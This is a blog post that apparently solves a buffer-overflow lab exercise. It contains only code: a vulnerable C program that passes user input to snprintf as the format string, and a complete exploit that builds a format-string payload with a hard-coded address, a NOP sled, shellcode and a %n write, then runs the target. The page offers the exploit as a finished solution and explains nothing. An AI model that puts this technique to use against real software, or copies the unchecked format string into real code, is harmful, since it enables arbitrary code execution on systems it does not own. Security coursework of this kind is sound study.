Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 6

Buffer Overflowing Target 6

target6.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int foo(char *arg) {

char buf[288];

snprintf(buf, sizeof buf, arg);

return 0;

}
int bar(char *argv[]) {

foo(argv[1]);

}

int main(int argc, char *argv[]) {

if (argc != 2)    {

fprintf(stderr, “target6: argc != 2\n”);

exit(EXIT_FAILURE);

}

bar(argv);

return 0;

}

sploit6.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include “shellcode.h”

#define TARGET “/tmp/target6”

int main(void) {

char *args[3];

char *env[1];

char buf[288];

int i;

int addr;

char *fmt_str;

addr = 0xbffffd5d;

fmt_str = “%u%u%012582639u%n”;

args[0] = TARGET; args[1] = buf; args[2] = NULL;

env[0] = NULL;

for(i = 0; i < 288; i++) {

if (i < 4)

*(buf+i) = addr >> (i*8);

else if (i < (287-strlen(fmt_str)-strlen(shellcode)))

*(buf+i) = ‘\x90’;

else if (i < (287-strlen(fmt_str)))

*(buf+i) = shellcode[i-287+strlen(fmt_str)+strlen(shellcode)];

else if (i < 287) {

memcpy(buf+i,fmt_str,strlen(fmt_str));

i += strlen(fmt_str)-1;

}

else

*(buf+i) = ‘\x00’;

}

if (0 > execve(TARGET, args, env))

fprintf(stderr, “execve failed.\n”);

return 0;

}

Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: